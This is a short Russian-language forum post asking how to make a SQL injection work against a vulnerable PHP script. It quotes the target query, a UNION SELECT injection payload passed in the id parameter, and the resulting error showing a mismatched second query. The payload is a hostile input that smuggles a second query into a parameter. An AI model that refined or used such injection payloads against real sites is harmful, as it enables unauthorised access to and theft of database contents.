помогите плз

есть уязвимый пхп скрипт(sql inj)

3 столбца

id=x

структура запросса:

SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id

соответственно на эту часть запроса я повлиять не могу:

and emb_gallery=gallery_id

При запросе:

id=9999+union+select+1,2,3--

ошибка:

SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed

КАК ПРАВИЛЬНО СОСТАВИТЬ ЗАПРОС?